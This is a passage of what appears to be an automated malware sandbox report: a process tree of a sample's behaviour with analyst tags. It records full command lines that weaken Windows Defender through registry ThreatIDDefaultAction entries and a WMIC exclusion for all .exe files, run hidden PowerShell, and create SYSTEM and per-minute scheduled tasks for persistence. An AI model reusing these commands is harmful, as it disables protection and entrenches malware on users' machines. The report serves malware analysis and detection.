        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:4616
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        13⤵
        
        PID:5692
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        11⤵
        
        PID:4188
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:5280
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        13⤵
        
        PID:5540
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        11⤵
        
        PID:5304
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        
        PID:5336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5072
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        14⤵
        
        PID:232
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        10⤵
        
        PID:3160
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        11⤵
        
        PID:836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3492
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        13⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3812
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 01:11:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS54D2.tmp\Install.exe\" 1g /CnGdidhpiN 385118 /S" /V1 /F
        10⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:3976
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"
        10⤵
        
        PID:5372
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bqGGCwwWIommTRgeuN
        11⤵
        
        PID:5488
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bqGGCwwWIommTRgeuN
        12⤵
        
        PID:5008
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 704
        10⤵
        Program crash
        
        PID:1948
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
        6⤵
        
        PID:5460
    - - C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2060
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:5080
      - C:\Users\Admin\AppData\Local\Temp\1000286001\download.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000286001\download.exe"
        6⤵
        Executes dropped EXE
        
        PID:5856
        
        C:\Users\Admin\AppData\Local\Temp\e57df83\download.exe
        
        run=1 shortcut="C:\Users\Admin\AppData\Local\Temp\1000286001\download.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe" /install
        8⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:6100
        
        C:\Program Files (x86)\Microsoft\Temp\EUF2FB.tmp\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\Temp\EUF2FB.tmp\MicrosoftEdgeUpdate.exe" /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
        9⤵
        Sets file execution options in registry
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Checks system information in the registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5832
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:6104
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies registry class
        
        PID:5248
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.39\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:4500
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.39\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:5696
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.39\MicrosoftEdgeUpdateComRegisterShell64.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.39\MicrosoftEdgeUpdateComRegisterShell64.exe"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Registers COM server for autorun
        Modifies registry class
        
        PID:5704
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NjE2MjA0ODQtMzMxMC00MjAyLUI1MTUtOTc0RDhGNTBEMEEwfSIgdXNlcmlkPSJ7NzBCOUE1MDYtRUJFNS00RjI4LTg0QzMtMDhFRDU4RTI1NUY2fSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9Ins0NDFFOEIxQy1BQkY0LTQ0MEItOThGQi03RTc1MTg5NjYwODN9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RHhPYmpIR2ErblJhMmF0QzN3bytJRXBDNzgrWlllQVVia1hwREMyY2o3VT0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7RjNDNEZFMDAtRUZENS00MDNCLTk1NjktMzk4QTIwRjFCQTRBfSIgdmVyc2lvbj0iMS4zLjE4Ny4zNyIgbmV4dHZlcnNpb249IjEuMy4xODcuMzkiIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUxMzc5MDQ4NzUiIGluc3RhbGxfdGltZV9tcz0iMTI1NzgiLz48L2FwcD48L3JlcXVlc3Q-
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks system information in the registry
        
        PID:5788
        
        C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
        
        "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{61620484-3310-4202-B515-974D8F50D0A0}"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:6124
- - C:\Users\Admin\AppData\Local\Temp\1000005001\2bf30d8f13.exe
    "C:\Users\Admin\AppData\Local\Temp\1000005001\2bf30d8f13.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:5016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 224 -ip 224
1⤵
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 880 -ip 880
1⤵
PID:4936

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:220

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4564

C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
1⤵
- Executes dropped EXE
PID:5408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2064

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5416
- C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xODcuMzkiIHNoZWxsX3ZlcnNpb249IjEuMy4xODcuMzkiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NjE2MjA0ODQtMzMxMC00MjAyLUI1MTUtOTc0RDhGNTBEMEEwfSIgdXNlcmlkPSJ7NzBCOUE1MDYtRUJFNS00RjI4LTg0QzMtMDhFRDU4RTI1NUY2fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7NDEwNDlFMUUtMkEyRi00MkRDLTg0NjUtMTNDQzdCOTYyNDNDfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjgiIHBoeXNtZW1vcnk9IjgiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0R4T2JqSEdhK25SYTJhdEMzd28rSUVwQzc4K1pZZUFVYmtYcERDMmNqN1U9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjExMC4wLjU0ODEuMTA0IiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIyMiIgaW5zdGFsbGRhdGV0aW1lPSIxNzE1MTY1MjU3IiBvb2JlX2luc3RhbGxfdGltZT0iMTMzNTk2NjI5MzgwMDAwMDAwIj48ZXZlbnQgZXZlbnR0eXBlPSIzMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMjExNDA2OCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNTE0NzU5MjI5OCIvPjwvYXBwPjwvcmVxdWVzdD4
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Checks system information in the registry
  PID:6104
- C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{448DFE75-04BD-4C4F-8E41-F150A1AF9955}\MicrosoftEdge_X64_125.0.2535.79.exe
  "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{448DFE75-04BD-4C4F-8E41-F150A1AF9955}\MicrosoftEdge_X64_125.0.2535.79.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
  2⤵
  - Executes dropped EXE
  PID:4532
- - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{448DFE75-04BD-4C4F-8E41-F150A1AF9955}\EDGEMITMP_2096A.tmp\setup.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{448DFE75-04BD-4C4F-8E41-F150A1AF9955}\EDGEMITMP_2096A.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{448DFE75-04BD-4C4F-8E41-F150A1AF9955}\MicrosoftEdge_X64_125.0.2535.79.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:1224
  - - C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{448DFE75-04BD-4C4F-8E41-F150A1AF9955}\EDGEMITMP_2096A.tmp\setup.exe
      "C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{448DFE75-04BD-4C4F-8E41-F150A1AF9955}\EDGEMITMP_2096A.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=125.0.6422.112 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{448DFE75-04BD-4C4F-8E41-F150A1AF9955}\EDGEMITMP_2096A.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=125.0.2535.79 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ff744424b18,0x7ff744424b24,0x7ff744424b30
      4⤵
      Executes dropped EXE
      PID:5548

C:\Users\Admin\AppData\Local\Temp\7zS54D2.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS54D2.tmp\Install.exe 1g /CnGdidhpiN 385118 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6132
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:4876
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:2952
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:5684
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:5784
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5328
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:6108
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5412
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:3456
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:2176
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5544
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:1648
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:2572
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:3680
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:4412
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:6120
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4120
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:1440
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2796
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:464
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6064
- - C:\Windows\SysWOW64\reg.exe
